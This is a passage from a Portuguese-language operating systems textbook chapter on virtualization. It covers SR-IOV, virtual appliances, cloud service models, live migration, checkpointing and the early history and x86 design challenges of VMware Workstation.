emulado frequentemente não implementa todas as fun- 
ções suportadas pelo hardware. Idealmente, a tecnolo- 
gia de virtualização ofereceria a equivalência de um 
passe de dispositivo através de um único dispositivo 
para múltiplos hipervisores, sem qualquer sobrecarga. 
Virtualizar um único dispositivo para enganar todas as 
máquinas virtuais a acreditar que ele tem acesso exclu- 
sivo ao seu próprio dispositivo é muito mais fácil se o 
hardware realmente realiza a virtualização para você. 
No PCIe, isso é conhecido como virtualização de E/S 
de raiz única. 

A virtualização de E/S de raiz única (SR-IOV — 
Single root I/O virtualization) nos permite passar ao 
longo do envolvimento do hipervisor na comunicação 
entre o driver e o dispositivo. Dispositivos que supor- 
tam SR-IOV proporcionam um espaço de memória in- 
dependente, interrupções e fluxos de DMA para cada 
máquina virtual que a usa (Intel, 2011). O dispositivo 
aparece como múltiplos dispositivos separados e cada 
um pode ser configurado por máquinas virtuais separa- 
das. Por exemplo, cada um terá um registro de endere- 
ço base e um espaço de endereçamento separado. Uma 
máquina virtual mapeia uma dessas áreas de memória 
(usadas por exemplo para configurar o dispositivo) no 
seu espaço de endereçamento. 

SR-IOV proporciona acesso ao dispositivo em dois 
sabores: PF (Physical Functions — Funções Físicas) e 
VF (Virtual Functions — Funções Virtuais). PFs estão 
cheios de funções PCIe e permitem que o dispositivo seja 
configurado de qualquer maneira que o administrador 
considere adequada. Funções físicas não são acessíveis 
aos sistemas operacionais hóspedes. VFs são funções 
PCle leves que não oferecem tais opções de configuração. 
Elas são idealmente ajustadas para máquinas virtuais. 
Em resumo, SR-IOV permite que os dispositivos sejam 
virtualizados em (até) centenas de funções virtuais que 
enganam as máquinas virtuais para acreditarem que são 
as únicas proprietárias de um dispositivo. Por exemplo, 
dada uma interface de rede SR-IOV, uma máquina vir- 
tual é capaz de lidar com sua placa de rede virtual como 
uma placa física. Melhor ainda, muitas placas modernas 


de rede têm buffers (circulares) separados para enviar e 
receber dados, dedicados a essas máquinas virtuais. Por 
exemplo, a série Intel 1350 de placas de rede tem oito 
filas de envio e oito de recebimento. 


7.8 Aplicações virtuais 


Máquinas virtuais oferecem uma solução interessan- 
te para um problema que há muito incomoda os usu- 
ários, especialmente usuários de software de código 
aberto: como instalar novos programas aplicativos. O 
problema é que muitas aplicações são dependentes de 
inúmeras outras aplicações e bibliotecas, que em si são 
dependentes de uma série de outros pacotes de software, 
e assim por diante. Além disso, pode haver dependên- 
cias em versões particulares dos compiladores, lingua- 
gens de scripts e do sistema operacional. 

Com as máquinas virtuais agora disponíveis, um 
desenvolvedor de software pode construir cuidadosa- 
mente uma máquina virtual, carregá-la com o sistema 
operacional exigido, compiladores, bibliotecas e códi- 
go de aplicação, e congelar a unidade inteira, pronta 
para executar. Essa imagem de máquina virtual pode 
então ser colocada em um CD-ROM ou um website 
para os clientes instalarem ou baixarem. Tal aborda- 
gem significa que apenas o desenvolvedor do software 
tem de compreender todas as dependências. Os clien- 
tes recebem um pacote completo que funciona de ver- 
dade, completamente independente de qual sistema 
operacional eles estejam executando e de que outros 
softwares, pacotes e bibliotecas eles tenham instalado. 
Essas máquinas virtuais “compactadas” são muitas ve- 
zes chamadas de aplicações virtuais. Como exemplo, 
a nuvem EC2 da Amazon tem muitas aplicações virtu- 
ais pré-elaboradas disponíveis para seus clientes, que 
ela oferece como serviços de software convenientes 
(“Software como Serviço”). 


7.9 Máquinas virtuais em CPUs com 
múltiplos núcleos 


A combinação de máquinas virtuais e CPUs de múlti- 
plos núcleos cria todo um mundo novo no qual o número 
de CPUs disponíveis pode ser estabelecido pelo software. 
Se existem, digamos, quatro núcleos, e cada um pode exe- 
cutar, por exemplo, até oito máquinas virtuais, uma única 
CPU (de mesa) pode ser configurada como um computa- 
dor de 32 nós se necessário, mas também pode ter menos 
CPUs, dependendo do software. Nunca foi possível para 
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um projetista de aplicações primeiro escolher quantas 
CPUs ele quer e então escrever o software de acordo. Isso 
é claramente uma nova fase na computação. 

Além disso, máquinas virtuais podem compartilhar 
memória. Um exemplo típico em que isso é útil é um 
único servidor sendo o hospedeiro de múltiplas instân- 
cias do mesmo sistema operacional. Tudo o que preci- 
sa ser feito é mapear as páginas físicas em espaços de 
endereços de múltiplas máquinas virtuais. O comparti- 
lhamento de memória já está disponível nas soluções 
de deduplicação. A deduplicação faz exatamente o que 
você pensa que ela faz: evita armazenar o mesmo dado 
duas vezes. Trata-se de uma técnica relativamente co- 
mum em sistemas de armazenamento, mas agora está 
aparecendo na virtualização também. No Disco, ela fi- 
cou conhecida como compartilhamento transparente 
de páginas (que exige modificações de acordo com o 
hóspede), enquanto o VMware a chama de comparti- 
lhamento de páginas baseado no conteúdo (que não 
exige modificação alguma). Em geral, a técnica consiste 
em varrer a memória de cada uma das máquinas virtuais 
em um hospedeiro e gerar um código de espalhamen- 
to (hash) das páginas da memória. Se algumas páginas 
produzirem um código de espalhamento idêntico, o sis- 
tema primeiro tem de conferir para ver se elas são de 
fato as mesmas, e se afirmativo, deduplicá-las, criando 
uma página com o conteúdo real e duas referências para 
aquela página. Dado que o hipervisor controla as tabelas 
de páginas aninhadas (ou sombras), esse mapeamento é 
direto. É claro, quando qualquer um dos hóspedes mo- 
dificar uma página compartilhada, a mudança não deve 
ser visível na(s) outra(s) maquina(s) virtual(ais). O tru- 
que é usar copy on write (cópia na escrita) de maneira 
que a página modificada será privada para o escritor. 

Se máquinas virtuais podem compartilhar a memó- 
ria, um único computador torna-se um multiprocessador 
virtual. Já que todos os núcleos em um chip de múlti- 
plos núcleos compartilham a mesma RAM, um único 
chip de quatro núcleos poderia facilmente ser configu- 
rado como um multiprocessador de 32 nós ou um multi- 
computador de 32 nós, conforme a necessidade. 

A combinação de múltiplos núcleos, máquinas vir- 
tuais, hipervisores e micronúcleos vai mudar radical- 
mente a maneira como as pessoas pensam a respeito 
de sistemas de computadores. Os softwares atuais não 
podem lidar com a ideia do programador determinando 
quantas CPUs são necessárias, se eles devem ser um 
multicomputador ou um multiprocessador e como os 
núcleos mínimos de um tipo ou outro se encaixam no 
quadro. O software futuro terá de lidar com essas ques- 
tões. Se você é estudante ou profissional de ciências da 
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computação ou engenharia, talvez seja você que dará 
um jeito nisso tudo. Vá em frente! 


7.10 Questões de licenciamento 


Alguns softwares são licenciados em uma base por 
CPU, especialmente aqueles para empresas. Em outras 
palavras, quando elas compram um programa, elas têm 
o direito de executá-lo em apenas uma CPU. O que é 
uma CPU, de qualquer maneira? Esse contrato dá a elas 
o direito de executar o software em múltiplas máquinas 
virtuais, todas executando na mesma máquina física? 
Muitos vendedores de softwares ficam de certa maneira 
inseguros a respeito do que fazer aqui. 

O problema é muito pior em empresas que têm uma 
licença que lhes permite ter n máquinas executando o 
software ao mesmo tempo, especialmente quando as má- 
quinas virtuais vêm e vão conforme a demanda. 

Em alguns casos, vendedores de softwares coloca- 
ram uma cláusula explícita na licença proibindo a licen- 
ça de executar o software em uma máquina virtual ou 
em uma máquina virtual não autorizada. Para empresas 
que executam todo o seu software exclusivamente em 
máquinas virtuais, esse poderia ser um problema de ver- 
dade. Se qualquer uma dessas restrições se justificará 
e como os usuários respondem a elas permanece uma 
questão em aberto. 


7.11 Nuvens 


A tecnologia de virtualização exerceu um papel cru- 
cial no crescimento extraordinário da computação na 
nuvem. Existem muitas nuvens. Algumas são públicas 
e estão disponíveis para qualquer um disposto a pagar 
pelo uso desses recursos; outras são de uma organiza- 
ção. Da mesma maneira, diferentes nuvens oferecem 
diferentes coisas. Algumas dão ao usuário acesso ao 
hardware físico, mas a maioria virtualiza seus am- 
bientes. Algumas oferecem diretamente as máquinas, 
virtuais ou não, e nada mais, mas outras oferecem um 
software que está pronto para ser usado e pode ser com- 
binado de maneiras interessantes, ou plataformas que 
facilitam aos usuários desenvolverem novos serviços. 
Provedores da nuvem costumam oferecer diferentes ca- 
tegorias de recursos, como “máquinas grandes” versus 
“máquinas pequenas” etc. 

Apesar de toda a conversa a respeito das nuvens, 
poucas pessoas parecem realmente ter certeza do que 
elas são de fato. O Instituto Nacional de Padrões e 


Tecnologia, sempre uma boa fonte com que contar, lista 
cinco características essenciais: 


1. Serviço automático de acordo com a demanda. 
Usuários devem ser capazes de abastecer-se de 
recursos automaticamente, sem exigir a interação 
humana, 

2. Acesso amplo pela rede. Todos esses recursos 
devem estar disponíveis na rede por mecanismos 
padronizados de maneira que dispositivos hetero- 
gêneos possam fazer uso deles. 

3. Pooling de recursos. O recurso de computação 
de propriedade do provedor deve ser colocado à 
disposição para servir múltiplos usuários e com 
a capacidade de alocar e realocar os recursos di- 
namicamente. Os usuários em geral não sabem 
nem a localização exata dos “seus” recursos ou 
mesmo em que país eles estão. 

4. Elasticidade rápida. Deveria ser possível ad- 
quirir e liberar recursos elasticamente, talvez até 
automaticamente, de modo a escalar de imediato 
com as demandas do usuário. 

5. Serviço mensurado. O provedor da nuvem men- 
sura Os recursos usados de uma maneira que casa 
com o tipo de serviço acordado. 


7.11.1 As nuvens como um serviço 


Nesta seção, examinaremos as nuvens com um foco 
na virtualização e nos sistemas operacionais. Especi- 
ficamente, consideramos nuvens que oferecem acesso 
direto a uma maquina virtual, a qual o usuário pode 
usar da maneira que ele achar melhor. Desse modo, 
a mesma nuvem pode executar sistemas operacio- 
nais diferentes, possivelmente no mesmo hardware. 
Em termos de nuvem, isso é conhecido como IAAS 
(Infrastructure As A Service — Infraestrutura como 
um serviço), em oposição ao PAAS (Platform As A 
Service — Plataforma como um serviço, que propor- 
ciona um ambiente que inclui questões como um SO 
específico, banco de dados, servidor da web, e assim 
por diante), SAAS (Software As A Service — Softwa- 
re como um serviço, que oferece acesso a softwares 
específicos, como o Microsoft Office 365, ou Google 
Apps) e muitos outros tipos. Um exemplo de nuvem 
IAAS é a Amazon EC2, que é baseada no hipervisor 
Xen e conta várias centenas de milhares de máquinas 
físicas. Contanto que tenha dinheiro, você pode ter o 
poder computacional que quiser. 

As nuvens podem transformar a maneira como 
as empresas realizam computação. Como um todo, 


consolidar os recursos de computação em um pequeno 
número de lugares (convenientemente localizados pró- 
ximos de uma fonte de energia e resfriamento barato) 
beneficia-se de uma economia de escala. Terceirizar 
o seu processamento significa que você não precisa 
se preocupar tanto com o gerenciamento da sua infra- 
estrutura de TI, backups, manutenção, depreciação, 
escalabilidade, confiabilidade, desempenho e talvez 
segurança. Tudo isso é feito em um lugar e, presumin- 
do que o provedor de nuvem seja competente, bem 
feito. Você pensaria que os gerentes de TI são mais 
felizes hoje do que há dez anos. No entanto, à medida 
que essas preocupações desapareceram, novas preocu- 
pações emergiram. Você pode realmente confiar que o 
seu provedor de nuvem vá manter seus dados seguros? 
Será que um concorrente executando na mesma infra- 
estrutura poderá inferir informações que você gostaria 
de manter privadas? Qual(ais) lei(s) aplica(m)-se aos 
seus dados (por exemplo, se o provedor de nuvem é 
dos Estados Unidos, os seus dados estão sujeitos à Lei 
PATRIOT, mesmo que a sua empresa esteja na Euro- 
pa)? Assim que você armazenar todos os seus dados na 
nuvem X, você será capaz de recuperá-las, ou estará 
preso aquela nuvem e ao seu provedor para sempre, 
algo conhecido como vinculado ao vendedor? 


7.11.2 Migração de maquina virtual 


A tecnologia de virtualização não apenas permite 
que nuvens IAAS executem múltiplos sistemas ope- 
racionais diferentes no mesmo hardware ao mesmo 
tempo, como ela também permite um gerenciamento 
inteligente. Já discutimos a capacidade de sobrealocar 
recursos, especialmente em combinação com a dedupli- 
cação. Agora examinaremos outra questão de gerencia- 
mento: e se uma máquina precisar de manutenção (ou 
mesmo substituição) enquanto ela está executando uma 
grande quantidade de máquinas importantes? Provavel- 
mente, os clientes não ficarão felizes se os seus sistemas 
caírem porque o provedor da nuvem quer substituir uma 
unidade do disco. 

Hipervisores desacoplam a máquina virtual do 
hardware físico. Em outras palavras, realmente não 
importa para a máquina virtual se ela executa nessa 
ou naquela máquina. Desse modo, o administrador 
poderia simplesmente derrubar todas as máquinas vir- 
tuais e reinicializá-las em uma máquina nova em fo- 
lha. Fazê-lo, no entanto, resulta em um tempo parado 
significativo. O desafio é mover a máquina virtual do 
hardware que precisa de manutenção para a máquina 
nova sem derrubá-la. 
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Uma abordagem ligeiramente melhor pode ser pau- 
sar a máquina virtual, em vez de desligá-la. Durante a 
pausa, fazemos a cópia das páginas de memória usadas 
pela máquina virtual para o hardware novo o mais rá- 
pido possível, configuramos as coisas corretamente no 
novo hipervisor e então retomamos a execução. Além 
da memória, também precisamos transferir o armaze- 
namento e a conectividade de rede, mas se as máqui- 
nas estiverem próximas, isso será feito relativamente 
rápido. Nós poderíamos fazer o sistema de arquivos ser 
baseado em rede para começo de conversa (como NFS, 
o sistema de arquivos de rede), de maneira que não im- 
porta se a sua máquina virtual está executando no rack 
do servidor 1 ou 3. Da mesma maneira, o endereço de IP 
pode simplesmente ser chaveado para uma nova locali- 
zação. Mesmo assim, ainda precisamos fazer uma pausa 
na máquina por um montante de tempo considerável. 
Menos tempo talvez, mas ainda considerável. 

Em vez disso, o que as soluções de virtualização 
modernas oferecem é algo conhecido como migração 
viva (live migration). Em outras palavras, eles movem 
a máquina virtual enquanto ela ainda é operacional. Por 
exemplo, eles empregam técnicas como migração de 
memória com pré-cópia. Isso significa que eles co- 
piam páginas da memória enquanto a máquina ainda 
está servindo solicitações. A maioria das páginas de 
memória não tem muita escrita, então copiá-las é algo 
seguro. Lembre-se, a máquina virtual ainda está exe- 
cutando, então uma página pode ser modificada após 
já ter sido copiada. Quando as páginas da memória são 
modificadas, temos de nos certificar de que a última 
versão seja copiada para o destino, então as marcamos 
como sujas. Elas serão recopiadas mais tarde. Quando 
a maioria das páginas da memória tiver sido copiada, 
somos deixados com um pequeno número de páginas 
sujas. Agora fazemos uma pausa muito brevemente para 
copiar as páginas restantes e retomar a máquina virtual 
na nova localização. Embora ainda exista uma pausa, 
ela é tão breve que as aplicações em geral não são afe- 
tadas. Quando o tempo de parada não é perceptível, ela 
é conhecida como uma migração viva sem emendas 
(seamless live migration). 


7.11.3 Checkpointing 


O desacoplamento de uma máquina virtual e do 
hardware físico tem vantagens adicionais. Em parti- 
cular, mencionamos que podemos pausar uma máqui- 
na. Isso em si é útil. Se o estado da máquina pausada 
(por exemplo, estado da CPU, páginas de memória e 
estado de armazenamento) está armazenado no disco, 
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temos uma imagem instantânea de uma máquina em 
execução. Se o software bagunçar uma máquina vir- 
tual ainda em execução, é possível apenas retroceder 
para a imagem instantânea e continuar como se nada 
tivesse acontecido. 

A maneira mais direta de gerar uma imagem ins- 
tantânea é copiar tudo, incluindo o sistema de arquivos 
inteiro. No entanto, copiar um disco de múltiplos tera- 
bytes pode levar um tempo, mesmo que ele seja um dis- 
co rápido. E, de novo, não queremos fazer uma pausa 
por muito tempo enquanto estamos fazendo isso. A so- 
lução é usar soluções cópia na escrita (copy on write), 
de maneira que o dado é copiado somente quando abso- 
lutamente necessário. 

Criar uma imagem instantânea funciona muito bem, 
mas há algumas questões. O que fazer se uma máquina 
estiver interagindo com um computador remoto? Pode- 
mos fazer uma imagem instantânea do sistema e trazê- 
-lo de volta novamente em um estágio posterior, mas 
a parte que estava se comunicando pode ter partido há 
tempos. Claramente, esse é um problema que não pode 
ser solucionado. 


7.12 Estudo de caso: VMware 


Desde 1999, a VMware, Inc., tem sido a provedora 
comercial líder de soluções de virtualização com pro- 
dutos para computadores de mesa, servidores, nuvem 
e agora até telefones celulares. Ela provê não somente 
hipervisores, mas também o software que gerencia má- 
quinas virtuais em larga escala. 

Começaremos este estudo de caso com uma breve 
história de como a companhia começou. Descrevere- 
mos então o VMware Workstation, um hipervisor tipo 
2 e o primeiro produto da empresa, os desafios no seu 
projeto e os elementos-chave da solução. Então descre- 
veremos a evolução do VMware Workstation através 
dos anos. Concluiremos com uma descrição do ESX 
Server, o hipervisor tipo 1 da VMware. 


7.12.1 A história inicial do VMware 


Embora a ideia de usar máquinas virtuais fosse popu- 
lar nos anos de 1960 e 1970 tanto na indústria da com- 
putação quanto na pesquisa acadêmica, o interesse na 
virtualização foi totalmente perdido após os anos 1980 e 
o surgimento da indústria do computador pessoal. Ape- 
nas a divisão de computadores de grande porte da IBM 
ainda se importava com a virtualização. Realmente, as 
arquiteturas de computação projetadas à época, e em 


particular a arquitetura do x86 da Intel, não forneciam 
suporte arquitetônico para a virtualização (isto é, eles 
falhavam nos critérios Popek/Goldberg). Isso é extre- 
mamente lamentável, tendo em vista que a CPU 386, 
um reprojeto completo da 286, foi produzida uma dé- 
cada após o estudo de Popek-Goldberg, e os projetistas 
deveriam ter atentado para isso. 

Em 1997, em Stanford, três dos futuros fundadores 
da VMware haviam construído um protótipo de hiper- 
visor chamado Disco (BUGNION et al., 1997), com a 
meta de executar sistemas operacionais comuns (em 
particular UNIX) em um multiprocessador de escala 
muito grande que então estava sendo desenvolvido em 
Stanford: a máquina FLASH. Durante aquele projeto, 
os autores perceberam que a utilização de máquinas 
virtuais poderia solucionar, de maneira simples e ele- 
gante, uma série de problemas difíceis de softwares de 
sistemas: em vez de tentar solucionar esses problemas 
dentro dos sistemas operacionais existentes, você pode- 
ria inovar em uma camada abaixo dos sistemas opera- 
cionais existentes. A observação chave do Disco foi de 
que, embora a alta complexidade dos sistemas operacio- 
nais modernos torne a inovação difícil, a simplicidade 
relativa de um monitor de máquina virtual e a sua posi- 
ção na pilha de software proporcionavam um ponto de 
partida poderoso para abordar as limitações de sistemas 
operacionais. Embora Disco fosse voltado para servido- 
res muito grandes e projetado para arquiteturas MIPS, 
os autores deram-se conta de que a mesma abordagem 
poderia igualmente aplicar-se e ser comercialmente re- 
levante para o mercado do x86. 

E, assim, a VMware, Inc., foi fundada em 1998 com 
a meta de trazer a virtualização para a arquitetura x86 e 
à indústria do computador pessoal. O primeiro produto 
da VMware (VMware Workstation) foi a primeira solu- 
ção de virtualização disponível para plataformas base- 
adas no x86 de 32 bits. O produto foi lançado em 1999 
e chegou em duas variantes: VMware Workstation 
para Linux, um hipervisor tipo 2 que executava sobre 
os sistemas operacionais hospedeiros Linux, e VMware 
Workstation for Windows, que executava de modo si- 
milar sobre o Windows NT. Ambas as variantes tinham 
uma funcionalidade idêntica: os usuários podiam criar 
múltiplas máquinas virtuais especificando primeiro as 
características do hardware virtual (como quanta me- 
mória dar à máquina virtual, ou o tamanho do disco 
virtual) e podiam então instalar o sistema operacional 
da sua escolha dentro da máquina virtual, em geral do 
CD-ROM (virtual). 

A VMware era em grande parte focada nos desen- 
volvedores e profissionais de TI. Antes da introdução 


da virtualização, um desenvolvedor tinha de rotina dois 
computadores em sua mesa, um estável para o desen- 
volvimento e um segundo em que ele podia reinstalar 
o software do sistema conforme necessário. Com a vir- 
tualização, o segundo sistema de teste tornou-se uma 
máquina virtual. 

Logo, o VMware começou a desenvolver um se- 
gundo e mais complexo produto, que seria lançado 
como ESX Server em 2001. O ESX Server alavan- 
cava o mesmo mecanismo de virtualização que o 
VMware Workstation, mas apresentado como parte 
de um hipervisor tipo 1. Em outras palavras, o ESX 
Server executava diretamente sobre o hardware sem 
exigir um sistema operacional hospedeiro. O hiper- 
visor ESX foi projetado para a consolidação de car- 
ga de trabalho intensa e continha muitas otimizações 
para assegurar que todos os recursos (memória da 
CPU e E/S) estivessem de maneira eficiente e justa 
alocados entre as máquinas virtuais. Por exemplo, ele 
foi o primeiro a introduzir o conceito de ballooning 
para reequilibrar a memória entre máquinas virtuais 
(WALDSPURGER, 2002). 

O ESX Server buscava o mercado de consolidação 
de servidores. Antes da introdução da virtualização, os 
administradores de TI costumavam comprar, instalar e 
configurar um novo servidor para cada nova tarefa ou 
aplicação que eles tinham de executar no centro de da- 
dos. O resultado foi que a infraestrutura era utilizada 
com muita ineficiência: servidores à época eram em ge- 
ral usados a 10% da sua capacidade (durante os picos). 
Com o ESX Server, os administradores de TI poderiam 
consolidar muitas máquinas virtuais independentes em 
um único servidor, poupando tempo, dinheiro, espaço 
de prateleira e energia elétrica. 

Em 2002, a VMware introduziu a sua primeira 
solução de gerenciamento para o ESX Server, origi- 
nalmente chamado Virtual Center, e hoje chamado 
vSphere. Ele fornecia um único ponto de gerencia- 
mento para um agrupamento de servidores executan- 
do máquinas virtuais: um administrador de TI poderia 
agora simplesmente conectar-se à aplicação Virtual 
Center e controlar, monitorar ou provisionar milhares 
de máquinas virtuais executando em toda a empresa. 
Com o Virtual Center surgiu outra inovação crítica, 
VMotion (NELSON et al., 2005), que permitia a 
migração viva de uma máquina virtual em execução 
pela rede. Pela primeira vez, um administrador de 
TI poderia mover um computador em execução de 
um local para outro sem ter de reinicializar o sistema 
operacional, reinicializar as aplicações, ou mesmo 
perder as conexões de rede. 
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7.12.2 VMware Workstation 


O VMware Workstation foi o primeiro produto de 
virtualização para os computadores x86 de 32 bits. A 
adoção subsequente da virtualização teve um impacto 
profundo sobre a indústria e sobre a comunidade da 
ciência da computação: em 2009, a ACM concedeu 
aos seus autores a ACM Software System Award pelo 
VMware Workstation 1.0 para o Linux. O VMware 
Workstation original é descrito em um artigo técnico 
detalhado (BUGNION et al., 2012). Aqui fornecemos 
um resumo desse estudo. 

A ideia era de que uma camada de virtualização po- 
deria ser útil em plataformas comuns construídas para 
CPUs de x86 e fundamentalmente executando os sis- 
temas Microsoft Windows (também conhecida como 
plataforma WinTel). Os benefícios da virtualização 
poderiam ajudar a lidar com algumas das limitações co- 
nhecidas da plataforma WinTel, como a interoperabili- 
dade da aplicação, a migração de sistemas operacionais, 
confiabilidade e segurança. Além disso, a virtualização 
poderia facilmente capacitar a coexistência de alternati- 
vas ao sistema operacional, em particular, Linux. 

Embora existissem décadas de pesquisas e desenvol- 
vimento comercial da tecnologia de virtualização em 
computadores de grande porte, o ambiente de compu- 
tação do x86 era diferente o bastante para que as novas 
abordagens fossem necessárias. Por exemplo, os com- 
putadores de grande porte eram integrados vertical- 
mente, significando que um único vendedor projetou 
o hardware, o hipervisor, os sistemas operacionais e a 
maioria das aplicações. 

Em comparação, a indústria do x86 era (e ainda é) 
desagregada em pelo menos quatro categorias diferen- 
tes: (a) Intel e AMD fazem os processadores; (b) Mi- 
crosoft oferece o Windows e a comunidade de código 
aberto oferece o Linux; (c) um terceiro grupo de com- 
panhias constrói os dispositivos de E/S e periféricos, as- 
sim como seus drivers de dispositivos correspondentes; 
e (d) um quarto grupo de integradores de sistemas como 
a HP e Dell produzem sistemas de computadores para 
venda a varejo. Para a plataforma x86, a virtualização 
precisaria primeiro ser inserida sem o suporte de qual- 
quer um desses representantes do setor. 

Como essa desagregação era um fato da vida, o 
VMware Workstation diferia dos monitores de maqui- 
nas virtuais clássicas que foram projetados como parte 
das arquiteturas de vendedor único com apoio explícito 
para a virtualização. Em vez disso, o VMware Work- 
station foi projetado para a arquitetura x86 e a indústria 
construída à volta dele. O VMware Workstation lidava 
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com esses novos desafios combinando técnicas de vir- 
tualização bem conhecidas, técnicas de outros domínios 
e novas técnicas em uma única solução. 

Discutiremos agora os desafios técnicos específicos 
na construção do VMware Workstation. 


7.12.3 Desafios em trazer a virtualização para o x86 


Lembre-se de nossa definição de hipervisores e má- 
quinas virtuais: hipervisores aplicam-se ao princípio 
bem conhecido de adicionar um nível de indireção 
ao domínio do hardware de computadores. Eles forne- 
cem a abstração das máquinas virtuais: cópias múl- 
tiplas do hardware subjacente, cada uma executando 
uma instância de sistema operacional independente. 
As máquinas virtuais são isoladas de outras máquinas 
virtuais, aparecem cada uma como uma duplicata do 
hardware subjacente, e o ideal é que executem com a 
mesma velocidade da máquina real. VMware adaptou 
esses atributos fundamentais de uma máquina virtu- 
al para uma plataforma alvo baseada em x86 como a 
seguir: 


1. Compatibilidade. A noção de um “ambiente es- 
sencialmente idêntico” significava que qualquer 
sistema operacional x86, e todas as suas aplica- 
ções, seriam capazes de executar sem modificações 
como uma máquina virtual. Um hipervisor preci- 
sava prover compatibilidade suficiente em nível de 
hardware de tal maneira que os usuários pudessem 
executar qualquer sistema operacional (até as ver- 
sões de atualização e remendo — patch) que eles 
quisessem instalar dentro de uma máquina virtual 
em particular, sem restrições. 

2. Desempenho. A sobrecarga do hipervisor tinha 
de ser suficientemente baixa para que os usuários 
pudessem usar uma máquina virtual como seu 
ambiente de trabalho primário. Como meta, os 
projetistas do VMware buscaram executar cargas 
de trabalho relevantes próximas de suas velocida- 
des nativas e no pior caso executá-las nos então 
atuais processadores com o mesmo desempenho, 
como se estivessem executando nativamente na 
geração imediatamente anterior de processa- 
dores. Isso foi baseado na observação de que a 
maior parte do software x86 não foi projetada 
para executar apenas na geração mais recente de 
CPUs. 

3. Isolamento. Um hipervisor tinha de garantir o 
isolamento da máquina virtual sem fazer quais- 
quer suposições a respeito do software execu- 
tando dentro. Isto é, um hipervisor precisava ter 


o controle completo dos recursos. O software 
executando dentro de máquinas virtuais tinha de 
ser impedido de acessar qualquer coisa que lhe 
permitisse subverter o hipervisor. Similarmente, 
um hipervisor tinha de assegurar a privacidade 
de todos os dados pertencentes à máquina virtual. 
Um hipervisor tinha de presumir que o sistema 
operacional hóspede poderia ser infectado com 
um código desconhecido e malicioso (uma preo- 
cupação muito maior hoje do que durante a era 
dos computadores de grande porte). 


Há uma tensão inevitável entre essas três exigências. 
Por exemplo, a compatibilidade total em determina- 
das áreas poderia levar a um impacto proibitivo sobre 
o desempenho, caso em que os projetistas do VMwa- 
re tinham de encontrar um equilíbrio. No entanto, eles 
abriram mão de qualquer troca que pudesse compro- 
meter o isolamento ou expor o hipervisor a ataques por 
um hóspede malicioso. Como um todo, quatro desafios 
importantes emergiram disso: 


1. A arquitetura x86 não era virtualizável. Ela 
continha instruções sensíveis à virtualização 
não privilegiadas, que violavam os critérios Po- 
pek e Goldberg para a virtualização estrita. Por 
exemplo, a instrução POPF tem uma semân- 
tica diferente (no entanto, não capturável) de- 
pendendo se o software executando atualmente 
tem permissão para desabilitar interrupções ou 
não. Isso eliminou a tradicional abordagem de 
captura e emulação para a virtualização. Mes- 
mo os engenheiros da Intel Corporation estavam 
convencidos de que os seus processadores não 
poderiam ser virtualizados de nenhuma maneira 
prática. 

2. A arquitetura x86 era de uma complexidade 
intimidante. A arquitetura x86 era uma arquite- 
tura CISC notoriamente complicada, incluindo 
suporte legado para múltiplas décadas de compa- 
tibilidade com dispositivos anteriores. Por anos, 
ela havia introduzido quatro modos principais 
de operações (real, protegido, v8086 e gerencia- 
mento de sistemas), cada um deles habilitando 
de maneiras diferentes o modelo de segmentação 
do hardware, mecanismos de paginação, anéis 
de proteção e características de segurança (como 
call gates). 

3. Máquinas x86 tinham periféricos diversos. 
Embora houvesse apenas dois vendedores de 
processadores x86 principais, os computadores 
pessoais da época podiam conter uma variedade 
enorme de placas e dispositivos que podiam ser 


incluídos, cada qual com seus próprios drivers de 
dispositivos específicos do vendedor. Virtualizar 
todos esses periféricos era impraticável. Isso ti- 
nha duas implicações: aplicava-se tanto ao front 
end (o hardware virtual exposto nas máquinas 
virtuais) quanto ao back end (o hardware de ver- 
dade que o hipervisor precisava ser capaz de con- 
trolar) dos periféricos. 

4. Necessidade de uma experiência do usuário 
simples. Hipervisores clássicos eram instalados 
na fábrica, similarmente ao firmware encontrado 
nos computadores de hoje. Como a VMware era 
uma startup, seus usuários teriam de adicionar os 
hipervisores a sistemas já existentes. VMware 
precisava de um modelo de entrega de softwares 
com uma experiência de instalação simples para 
encorajar a adoção. 


7.12.4 VMware Workstation: visão geral da solução 


Esta seção descreve em um alto nível como o VMware 
Workstation lidou com os desafios mencionados na se- 
ção anterior. 

O VMware Workstation é um hipervisor tipo 2 que 
consiste em módulos distintos. Um módulo importante 
é o VMM, que é responsável por executar as instruções 
da máquina virtual. Um segundo módulo importan- 
te é o VMX, que interage com o sistema operacional 
hospedeiro. 

A seção cobre primeiro como o VMM soluciona a 
“não virtualizabilidade” da arquitetura do x86. Então, 
descrevemos estratégia centrada no sistema operacional 
usada pelos projetistas pela fase de desenvolvimento. 
Depois, descrevemos o projeto da plataforma de hard- 
ware virtual, o que resolve metade do desafio da diver- 
sidade de periféricos. Por fim, discutimos o papel do 
sistema operacional hospedeiro no VMware Worksta- 
tion, e em particular a interação entre os componentes 
VMM e VMX. 


Virtualizando a arquitetura x86 


O VMM executa a máquina virtual; ele possibilita 
sua progressão. Um VMM construído para uma arqui- 
tetura virtualizável usa uma técnica conhecida como 
captura e emulação para executar a sequência de instru- 
ções da máquina virtual de modo direto, mas seguro, no 
hardware. Quando isso não é possível, uma abordagem 
é especificar um subconjunto virtualizável da arquite- 
tura do processador e adaptar os sistemas operacionais 
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hóspedes para aquela plataforma recentemente definida. 
Essa técnica é conhecida como paravirtualização (BA- 
RHAM et al., 2003; WHITAKER et al., 2002) e exige 
modificações ao nível do código fonte do sistema ope- 
racional. Colocando a questão de maneira mais direta, a 
paravirtualização modifica o hóspede para evitar fazer 
qualquer coisa com que o hipervisor não possa lidar. A 
paravirtualização era impraticável no VMware por cau- 
sa da exigência de compatibilidade e da necessidade de 
executar sistemas operacionais cujo código-fonte não 
estivesse disponível, em particular o Windows. 

Uma alternativa seria empregar uma abordagem de 
emulação completa. Assim, as instruções das máquinas 
virtuais são emuladas pelo VMM no hardware (em vez 
de diretamente executadas). Isso pode ser bastante efi- 
ciente; a experiência anterior com o simulador de má- 
quinas SimOS (ROSENBLUM et al., 1997) mostrou 
que o uso de técnicas como a tradução binária dina- 
mica executando em um programa ao nível do usuário 
poderiam limitar a sobrecarga da emulação completa a 
um fator de cinco de redução de desempenho. Embora 
isso seja bastante eficiente, e decerto útil para fins de 
simulação, um fator de cinco de redução era claramente 
inadequado e não atenderia às exigências de desempe- 
nho desejadas. 

A solução para esse problema combinava dois in- 
sights fundamentais. Primeiro, embora a execução 
direta de captura e emulação não pudesse ser usada 
para virtualizar toda a arquitetura x86 o tempo inteiro, 
ela poderia na realidade ser usada em parte do tempo. 
Em particular, ela poderia ser usada durante a execu- 
